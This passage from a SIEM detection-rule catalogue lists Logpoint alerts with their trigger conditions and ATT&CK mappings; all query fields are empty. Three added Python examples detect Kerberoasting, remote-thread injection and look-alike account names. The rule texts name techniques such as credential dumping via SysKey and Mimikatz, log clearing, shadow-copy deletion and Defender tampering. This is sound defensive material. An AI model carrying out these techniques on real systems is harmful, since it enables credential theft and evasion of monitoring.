ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Access to Sensitive File Extensions
Trigger Condition: Sensitive file extensions are detected.
ATT&CK Category: Collection
ATT&CK Tag: Data Staged
ATT&CK ID: T1074
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Calculator Usage Detected
Trigger Condition: The use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Call by Ordinal Detected
Trigger Condition: Suspicious execution of exported functions in DLLs through RunDLL32 via ordinal (16-bit integer).
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Compression Tool Parameters
Trigger Condition: Suspicious command-line arguments of standard data compression tools such as 7z and RAR are detected. Adversaries compress collected data before exfiltrating it.
ATT&CK Category: Collection, Exfiltration
ATT&CK Tag: Automated Exfiltration, Archive Collected Data
ATT&CK ID: T1020, T1560
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Control Panel DLL Load Detected
Trigger Condition: Suspicious execution of rundll32.exe from control.exe is detected. Adversaries may use this technique to proxy execution of their malicious code through a signed binary without being noticed by security controls.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Csc Source File Folder Detected
Trigger Condition: Suspicious execution of csc.exe with a source file in a suspicious folder such as AppData is detected. Adversaries often deliver source code and compile it on the victim's computer with csc.exe.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Compile After Delivery, Visual Basic, JavaScript, Mshta
ATT&CK ID: T1027.004, T1059.005, T1059.007, T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Double Extension Detected
Trigger Condition: This alert is triggered whenever it detects a file with a double extension, for example .pdf.exe.
ATT&CK Category: Initial Access
ATT&CK Tag: Spearphishing Attachment
ATT&CK ID: T1566.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Driver Load from Temp
Trigger Condition: A driver loaded from a temporary directory is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Windows Service
ATT&CK ID: T1543.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Eventlog Clear or Configuration Using Wevtutil Detected
Trigger Condition: Clearing or reconfiguration of event logs using wevtutil, PowerShell, or wmic is detected. Adversaries use this technique to delete logs and hide their traces.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Clear Windows Event Logs, Disable Windows Event Logging
ATT&CK ID: T1070.001, T1562.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious GUP Usage Detected
Trigger Condition: This alert is triggered whenever it detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Kerberos RC4 Ticket Encryption
Trigger Condition: This alert is triggered whenever it detects service ticket requests using the RC4 encryption type.
ATT&CK Category: Credential Access
ATT&CK Tag: Kerberoasting
ATT&CK ID: T1558.003
Minimum Log Source Requirement: Windows
Query:
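Worked example, added here and not part of Logpoint's rule set: the RC4 service-ticket filter of the rule above written in Python over constructed Security Event ID 4769 records, with the exclusions a practitioner needs (computer accounts, krbtgt, failed requests, a tunable allowlist of legacy services). It goes beyond the rule text by adding the aggregation that separates a lone legacy RC4 request from the sweep pattern of a Kerberoasting run, in which one account requests tickets for many distinct service accounts. Account names, SPN holders and the min_services threshold are assumptions.

```python
# Added example (not Logpoint's query): RC4-HMAC (0x17) TGS requests and
# the many-services-per-requester sweep that Kerberoasting produces.
# Events are constructed samples using 4769 field names.
from collections import defaultdict

RC4_ETYPES = {"0x17", "0x18"}      # RC4-HMAC, RC4-HMAC-EXP
KRB_SUCCESS = "0x0"


def is_rc4_service_ticket(ev: dict, allow_services=()) -> bool:
    """RC4 TGS request worth looking at.

    Excluded: computer accounts (ServiceName ends with '$'), krbtgt (the TGT
    itself), failed requests, and explicitly allowlisted legacy services."""
    if ev.get("EventID") != 4769:
        return False
    if ev.get("TicketEncryptionType", "").lower() not in RC4_ETYPES:
        return False
    if ev.get("Status", KRB_SUCCESS) != KRB_SUCCESS:
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return svc.lower() not in {s.lower() for s in allow_services}


def rc4_ticket_hits(events, allow_services=()):
    return [ev for ev in events if is_rc4_service_ticket(ev, allow_services)]


def kerberoast_sweeps(events, min_services=3, allow_services=()):
    """Requesters that obtained RC4 tickets for >= min_services distinct
    service accounts. A single RC4 request is often legacy noise; the sweep
    is what a Kerberoasting tool produces when it asks for every SPN."""
    services = defaultdict(set)
    for ev in rc4_ticket_hits(events, allow_services):
        services[ev["TargetUserName"].lower()].add(ev["ServiceName"].lower())
    return {user: sorted(s) for user, s in services.items() if len(s) >= min_services}


def _tgs(user, service, etype, status=KRB_SUCCESS):
    """Constructed 4769 record (assumed field set)."""
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status, "IpAddress": "10.0.0.50"}


# Constructed sample: alice's normal AES tickets plus one RC4 ticket for a
# legacy service, and jdoe pulling RC4 tickets for every SPN-bearing account.
SAMPLE_EVENTS = [
    _tgs("alice@corp.local", "WS01$", "0x12"),
    _tgs("alice@corp.local", "krbtgt", "0x12"),
    _tgs("alice@corp.local", "svc_legacyapp", "0x17"),
    _tgs("jdoe@corp.local", "svc_sql", "0x17"),
    _tgs("jdoe@corp.local", "svc_web", "0x17"),
    _tgs("jdoe@corp.local", "svc_backup", "0x17"),
    _tgs("jdoe@corp.local", "svc_broken", "0x17", status="0x1b"),  # not granted
    _tgs("jdoe@corp.local", "DC01$", "0x17"),
]

if __name__ == "__main__":
    print("rc4 hits:", [(e["TargetUserName"], e["ServiceName"])
                        for e in rc4_ticket_hits(SAMPLE_EVENTS)])
    print("sweeps:", kerberoast_sweeps(SAMPLE_EVENTS))
```

Build the allowlist from a baseline of which services still request RC4 in your domain, then alert on the sweep rather than on every hit; the sweep is also the signal behind the Rubeus and outbound-Kerberos rules later in this list.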
LP_Suspicious Named Pipes Detected
Trigger Condition: Suspicious named pipes commonly used by threat actors are detected.
ATT&CK Category: Defense Evasion, Privilege Escalation, Lateral Movement
ATT&CK Tag: Process Injection, Lateral Tool Transfer
ATT&CK ID: T1055, T1570
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Outbound Kerberos Connection
Trigger Condition: This alert is triggered whenever it detects suspicious outbound network activity over Kerberos.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Parent of Csc Detected
Trigger Condition: A suspicious parent of csc.exe is detected. csc.exe is the C# compiler that ships with the Microsoft .NET Framework.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Compile After Delivery, Visual Basic, JavaScript, Mshta
ATT&CK ID: T1027.004, T1059.005, T1059.007, T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious PowerShell Invocation Based on Parent Process
Trigger Condition: Suspicious PowerShell invocations from script interpreters or unusual parent programs such as wscript or the IIS worker process (w3wp.exe) are detected. Other suspicious parent processes can be added to the rule to increase visibility.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Process Start Locations Detected
Trigger Condition: This alert is triggered whenever it detects the execution of suspicious processes from unusual locations like Recycle bin, Fonts folder, etc.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Program Location with Network Connections
Trigger Condition: Programs with network connections executed in suspicious file system locations.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious PsExec Execution Detected
Trigger Condition: This alert is triggered whenever execution of PsExec or PAExec with a renamed service name is detected. Matching on the service name helps filter out noise when PsExec is used for legitimate purposes, and still catches an attacker using a PsExec client other than the Sysinternals one.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Lateral Tool Transfer
ATT&CK ID: T1570
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Remote Thread Created
Trigger Condition: This alert is triggered when a process that should not behave this way (for example winword.exe or outlook.exe) creates a remote thread in another process. Malware uses this technique to inject code and hide in other processes. The event records the source and target process and describes the code that will run in the new thread: StartAddress, StartModule, and StartFunction.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon
Query:
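Worked example, added here and not part of Logpoint's rule set: parsing Sysmon Event ID 8 (CreateRemoteThread) records and applying the checks the rule above describes, in Python. It flags a source process that should never create remote threads (Office applications, browsers), a thread that starts at kernel32!LoadLibrary (the classic DLL-injection signature), and a thread planted in a sensitive target such as lsass.exe. The XML records are constructed in the Sysmon event schema, not captured from a host, and the process lists are assumptions to be tuned.

```python
# Added example (not Logpoint's query): Sysmon EID 8 triage. The XML below
# is constructed in the Sysmon schema; images, paths and addresses are made up.
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

UNEXPECTED_SOURCES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "msedge.exe", "chrome.exe", "firefox.exe", "acrord32.exe"}
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe"}
LOADLIBRARY = {"loadlibrarya", "loadlibraryw", "loadlibraryexa", "loadlibraryexw"}


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten <EventData><Data Name=...> into a dict and keep the EventID."""
    ev = {}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]          # drop the schema namespace
        if tag == "EventID":
            ev["EventID"] = int(el.text)
        elif tag == "Data" and "Name" in el.attrib:
            ev[el.attrib["Name"]] = el.text or ""
    return ev


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def remote_thread_reasons(ev: dict):
    """Why (if at all) this Event ID 8 is suspicious; empty list means benign."""
    if ev.get("EventID") != 8:
        return []
    reasons = []
    src, tgt = _basename(ev.get("SourceImage", "")), _basename(ev.get("TargetImage", ""))
    if src in UNEXPECTED_SOURCES:
        reasons.append(f"unexpected source {src}")
    if tgt in SENSITIVE_TARGETS:
        reasons.append(f"sensitive target {tgt}")
    if (_basename(ev.get("StartModule", "")) in {"kernel32.dll", "kernelbase.dll"}
            and ev.get("StartFunction", "").lower() in LOADLIBRARY):
        reasons.append("thread starts at LoadLibrary (DLL injection)")
    return reasons


def _event8(src, tgt, module="", func="", addr="0x00007FFB12340000"):
    """Constructed Sysmon EID 8 XML carrying the fields the rule cares about."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>8</EventID></System>
  <EventData>
    <Data Name="SourceImage">{src}</Data>
    <Data Name="TargetImage">{tgt}</Data>
    <Data Name="StartAddress">{addr}</Data>
    <Data Name="StartModule">{module}</Data>
    <Data Name="StartFunction">{func}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    _event8(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
            r"C:\Windows\explorer.exe"),
    _event8(r"C:\Users\jdoe\AppData\Local\Temp\inject.exe",
            r"C:\Windows\System32\notepad.exe",
            module=r"C:\Windows\System32\KERNEL32.DLL", func="LoadLibraryA"),
    _event8(r"C:\Users\jdoe\Downloads\dump.exe", r"C:\Windows\System32\lsass.exe"),
    _event8(r"C:\Windows\System32\csrss.exe",
            r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
]


def scan(xml_events):
    """(source, target, reasons) for each suspicious event."""
    out = []
    for ev in map(parse_sysmon_event, xml_events):
        reasons = remote_thread_reasons(ev)
        if reasons:
            out.append((_basename(ev["SourceImage"]), _basename(ev["TargetImage"]), reasons))
    return out


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The csrss.exe record is the control: csrss legitimately creates remote threads in many processes, which is why the rule keys on the source image rather than alerting on every Event ID 8.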
LP_Suspicious RUN Key from Download Detected
Trigger Condition: Suspicious Run keys created by software located in the Downloads folder or in temporary Outlook/Internet Explorer directories, which may signal malicious activity, are detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Boot or Logon Autostart Execution, Registry Run Keys/Startup Folder
ATT&CK ID: T1547, T1547.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Rundll32 Activity Detected
Trigger Condition: This alert is triggered whenever it detects suspicious processes related to the RunDLL32 system binary based on its command line arguments.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Service Path Modification Detected
Trigger Condition: Modification of a service binary path to PowerShell or cmd is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Windows Service
ATT&CK ID: T1543.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious TSCON Start
Trigger Condition: Execution of tscon.exe as LOCAL SYSTEM is detected. When tscon.exe runs as SYSTEM, adversaries can connect to another user's logged-in session without supplying credentials.
ATT&CK Category: Command and Control
ATT&CK Tag: Remote Access Software
ATT&CK ID: T1219
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Potential Suspicious Malware Callback Communication
Trigger Condition: Programs connecting to typical malware back-connect ports, chosen by statistical analysis of two different sandbox system databases, are detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Non-Standard Port
ATT&CK ID: T1571
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Userinit Child Process
Trigger Condition: This alert is triggered whenever it detects a suspicious process spawned by Userinit.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Windows ANONYMOUS LOGON Local Account Creation
Trigger Condition: Creation of accounts whose names mimic ANONYMOUS LOGON, for example with additional spaces, is detected. Such names are chosen to slip through detection exclusions for Logon Type 3 events from the ANONYMOUS LOGON account.
ATT&CK Category: Persistence
ATT&CK Tag: Create Account
ATT&CK ID: T1136
Minimum Log Source Requirement: Windows
Query:
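Worked example, added here and not part of Logpoint's rule set: the look-alike check behind the rule above, in Python over constructed Security Event ID 4720 (account created) records. It normalises candidate names (Unicode compatibility form, invisible characters, whitespace, case) and compares them with the built-in principal names, so padded, non-breaking-space and full-width variants all surface. It goes slightly beyond the rule text by covering SYSTEM, LOCAL SERVICE and NETWORK SERVICE as well; the sample account names are made up.

```python
# Added example (not Logpoint's query): detect newly created accounts whose
# names mimic built-in security principals. 4720 records are constructed.
import re
import unicodedata

BUILTIN_PRINCIPALS = {"anonymous logon", "system", "local service", "network service"}
# Zero-width and byte-order-mark code points that a naive strip() leaves in place
_INVISIBLE = re.compile(r"[\u200b\u200c\u200d\u2060\ufeff]")


def canonical(name: str) -> str:
    """Compatibility-normalise, drop invisible chars, squash spaces, fold case."""
    name = unicodedata.normalize("NFKC", name)   # NBSP -> space, full-width -> ASCII
    name = _INVISIBLE.sub("", name)
    name = re.sub(r"\s+", " ", name).strip()
    return name.casefold()


def lookalike_reason(name: str):
    """Return why the name is a look-alike, or None if it is clean."""
    canon = canonical(name)
    if canon not in BUILTIN_PRINCIPALS:
        return None
    if name.casefold() == canon:
        return f"exact built-in name {name!r} created as a local account"
    if name != name.strip() or "  " in name:
        return f"{name!r} is {canon.upper()!r} padded with whitespace"
    return f"{name!r} normalises to {canon.upper()!r} (look-alike characters)"


def suspicious_account_creations(events):
    """(TargetUserName, SubjectUserName, reason) for each suspicious 4720."""
    out = []
    for ev in events:
        if ev.get("EventID") != 4720:
            continue
        reason = lookalike_reason(ev.get("TargetUserName", ""))
        if reason:
            out.append((ev["TargetUserName"], ev.get("SubjectUserName", "?"), reason))
    return out


def _created(target, by="admin"):
    """Constructed 4720 record (assumed field set)."""
    return {"EventID": 4720, "TargetUserName": target, "SubjectUserName": by}


SAMPLE_EVENTS = [
    _created("ANONYMOUS LOGON "),            # trailing space
    _created("anonymous\u00a0logon"),        # non-breaking space instead of space
    _created("ＳＹＳＴＥＭ"),                 # full-width letters
    _created("svc_backup"),                  # ordinary account, must not fire
    _created("Local  Service"),              # double space
]

if __name__ == "__main__":
    for hit in suspicious_account_creations(SAMPLE_EVENTS):
        print(hit)
```

Do the same normalisation on the exclusion side of your logon rules: an exclusion written as an exact string match on "ANONYMOUS LOGON" is precisely what the padded account name is designed to fall outside of.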
LP_Suspicious WMI Execution Detected
Trigger Condition: WMI executing suspicious commands, including but not limited to antivirus product enumeration and remote process creation, is detected. WMIC.exe is a built-in Microsoft program that provides command-line access to Windows Management Instrumentation. Adversaries use it to create remote or local processes, enumerate antivirus and firewall products, delete shadow copies, and modify Defender configuration.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_SysKey Registry Keys Access
Trigger Condition: Handle requests and access operations on the specific registry keys used to calculate the SysKey are detected. Adversaries use a tool like Mimikatz or a script like Invoke-PowerDump to obtain the SysKey, decrypt Security Account Manager (SAM) database entries from the registry or hive, and recover the NTLM and LM hashes of local account passwords.
ATT&CK Category: Discovery
ATT&CK Tag: Query Registry
ATT&CK ID: T1012
Minimum Log Source Requirement: Windows
Query:
LP_Sysmon Configuration Modification Detected
Trigger Condition: This alert is triggered whenever modification of the Sysmon (System Monitor) configuration is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Sysmon Driver Unload Detected
Trigger Condition: Unloading of the Sysmon driver is detected. Sysmon logs error events once the driver is gone, and from then on no events are collected or parsed.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Sysmon Error Event Detected
Trigger Condition: Sysmon error event is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_System Service Discovery
Trigger Condition: This alert is triggered when binaries that can be used to retrieve Windows service information are detected.
ATT&CK Category: Discovery
ATT&CK Tag: System Service Discovery
ATT&CK ID: T1007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Tap Driver Installation Detected
Trigger Condition: Installation of TAP driver software is detected. It indicates possible preparation for data exfiltration using tunnelling techniques.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Alternative Protocol
ATT&CK ID: T1048
Minimum Log Source Requirement: Windows
Query:
LP_Tasks Folder Evasion Detected
Trigger Condition: Use of the Windows Tasks folder for evasion purposes is detected. Adversaries can place a custom assembly in the Tasks folder and cause script hosts or .NET applications such as cscript, wscript, regsvr32, mshta, and eventvwr to load and execute it.
ATT&CK Category: Persistence, Privilege Escalation, Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading
ATT&CK ID: T1574, T1574.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Terminal Service Process Spawn Detected
Trigger Condition: A process spawned by the terminal service server process is detected. It can be an indicator of exploitation of CVE-2019-0708.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Exploitation of Remote Services
ATT&CK ID: T1210
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Threat Intel Allowed Connections from Suspicious Sources
Trigger Condition: A connection from a suspicious source is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Threat Intel Connections with Suspicious Domains
Trigger Condition: A connection is established with a suspicious domain.
Minimum Log Source Requirement: Firewall, IDS/IPS
Query:
LP_Transfering Files with Credential Data via Network Shares
Trigger Condition: This alert is triggered whenever sensitive files with well-known file names (such as the ones containing credential data) are transferred using network shares.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory, Security Account Manager, NTDS
ATT&CK ID: T1003.001, T1003.002, T1003.003
Minimum Log Source Requirement: Windows
Query:
LP_TrendMicroDeepSecurity Virus Quarantined
Trigger Condition: A virus-infected file is quarantined.
ATT&CK Category: Defense Evasion, Discovery
ATT&CK Tag: Obfuscated Files or Information, Indicator Removal from Tools, Network Service Scanning
ATT&CK ID: T1027, T1027.005, T1046
Minimum Log Source Requirement: Trend Micro Deep Security
Query:
LP_UAC Bypass via Event Viewer Detected
Trigger Condition: Usage of eventvwr.exe to bypass UAC.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Unix Possible Bruteforce Attack
Trigger Condition: Repeated login attempts with an account that does not exist are detected. This may indicate a brute force attack by a bot, malware, or threat actor.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: Unix
Query:
LP_Unix User Deleted
Trigger Condition: Deletion of a user account.
ATT&CK Category: Impact
ATT&CK Tag: Account Access Removal
ATT&CK ID: T1531
Minimum Log Source Requirement: Unix
Query:
LP_Unsigned Driver Loading Detected
Trigger Condition: Loading of an unsigned driver.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Create or Modify System Process
ATT&CK ID: T1543
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Ursnif Registry Activity
Trigger Condition: This alert is triggered whenever it detects a new registry key under AppDataLow\Software\Microsoft, a location Ursnif malware has been observed to use.
ATT&CK Category: Execution
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_VBA DLL Loaded by Office
Trigger Condition: Loading of a DLL related to VBA macros by Office products is detected. To reduce false positives, filter out known legitimate macro use.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_VM - High Risk Vulnerability on High Impact Assets
Trigger Condition: A high-risk vulnerability is detected on high-impact assets.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - High Risk Vulnerability on Medium Impact Assets
Trigger Condition: A high-risk vulnerability is detected on medium-impact assets.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - Medium Risk Vulnerability on Low Impact Assets
Trigger Condition: A medium-risk vulnerability is detected on low-impact assets.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_WannaCry MS17-010 Vulnerable Sources
Trigger Condition: The MS17-010 vulnerability is detected.
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_WCE wceaux dll Access Detected
Trigger Condition: wceaux.dll access during Windows Credential Editor (WCE) pass-the-hash remote command execution on the source host.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_Wdigest Registry Modification
Trigger Condition: Modification of the wdigest registry value. Adversaries can enable wdigest authentication and retrieve users’ plain text credentials.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Weak Encryption Enabled for User
Trigger Condition: Weak encryption enabled for a user profile, which is later used for hash or password cracking.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Potential Webshell Activity Detected
Trigger Condition: Specific command line parameters associated with reconnaissance activities via web shells are detected.
ATT&CK Category: Discovery, Persistence
ATT&CK Tag: Remote System Discovery, System Owner/User Discovery, Account Discovery, Web Shell
ATT&CK ID: T1018, T1033, T1087, T1505.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows Audit Logs Cleared
Trigger Condition: The Windows Security audit log is cleared.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Clear Windows Event Logs
ATT&CK ID: T1070.001
Minimum Log Source Requirement: Windows
Query:
LP_Windows Data Copied to Removable Device
Trigger Condition: A file is copied to removable storage. For this alert to work, you must update the list CRITICAL_HOSTS, which includes hosts where admin monitors file copy across removable storage.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Physical Medium, Exfiltration over USB
ATT&CK ID: T1052, T1052.001
Minimum Log Source Requirement: Windows
Query:
LP_Windows Defender Antivirus Disable via Registry Modification
Trigger Condition: This alert is triggered whenever the usage of “reg.exe” to tamper with different Windows Defender registry keys is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Tools
ATT&CK ID: T1562.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Shadow Copy Deletion Using OS Utilities Detected
Trigger Condition: Deletion of volume shadow copies using operating system utilities. Adversaries can use Windows internal binaries such as PowerShell, wmic, vssadmin, diskshadow and wbadmin to delete shadow copies from the system, so that data recovery and reverting the system to a saved state are impossible after the malware is dropped.
ATT&CK Category: Impact, Defense Evasion
ATT&CK Tag: Inhibit System Recovery, Indicator Removal
ATT&CK ID: T1490, T1070
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Windows Excessive Amount of Files Copied to Removable Device
Trigger Condition: A user copying one hundred or more files to a removable storage device is detected. Threat actors generally attempt to exfiltrate as much data as possible from victim organizations through removable storage devices. Setting the threshold value according to the organization’s behavior or risk appetite is recommended. It is recommended to enable this alert only if the organizational policy explicitly disallows this behavior.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Physical Medium, Exfiltration over USB
ATT&CK ID: T1052, T1052.001
Minimum Log Source Requirement: Windows
Query:
LP_Windows Failed Login Attempt Using Service Account
Trigger Condition: A user fails to log in using a service account. Generally, failed logon events with logon type 5 indicate that a password was changed without updating the service; however, the possibility of a malicious user at work exists. Conversely, a malicious user is less likely, because creating a new service or editing an existing one by default requires membership in Administrators or Server Operators, and such a user would already have the authority to achieve their desired goal.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Windows Failed Login Followed by Lockout Event
Trigger Condition: A failed login attempt followed by account lockout is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Exploitation for Credential Access, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Brute Force
ATT&CK ID: T1078, T1212, T1068, T1211, T1110
Minimum Log Source Requirement: Windows
Query:
LP_Windows Local User Management
Trigger Condition: A user is created on a non-domain controller. For the alert to work, you must update the list DOMAIN with domain controllers.
ATT&CK Category: Persistence
ATT&CK Tag: Create Account, Local Account
ATT&CK ID: T1136, T1136.001
Minimum Log Source Requirement: Windows
Query:
LP_WMI DLL Loaded by Office
Trigger Condition: Loading of DLLs related to WMI by Office products signaling VBA macros executing WMI Commands.
ATT&CK Category: Execution
ATT&CK Tag: User Execution, Malicious File
ATT&CK ID: T1204, T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Registry Persistence COM Key Linking Detected
Trigger Condition: COM object hijacking via TreatAs subkey is detected. It is rare, but there are some cases where system utilities use linking keys for backward compatibility.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Component Object Model Hijacking
ATT&CK ID: T1546, T1546.015
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Shell Spawning Suspicious Program
Trigger Condition: A suspicious child process of Windows Shell and scripting processes such as Wscript, Rundll32, Regsvr32, powershell and Mshta is detected.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Visual Basic, System Binary Proxy Execution
ATT&CK ID: T1059.001, T1059.005, T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows User Account Change to End with Dollar Sign
Trigger Condition: A user account is changed to end with the dollar sign ($).
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation
ATT&CK ID: T1098
Minimum Log Source Requirement: Windows
Query:
LP_Windows Webshell Creation Detected
Trigger Condition: Creation of a WebShell file on a static web site. The alert has been directly translated from a Sigma rule.
ATT&CK Category: Persistence
ATT&CK Tag: Server Software Component, Web Shell
ATT&CK ID: T1505, T1505.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Winlogon Helper DLL
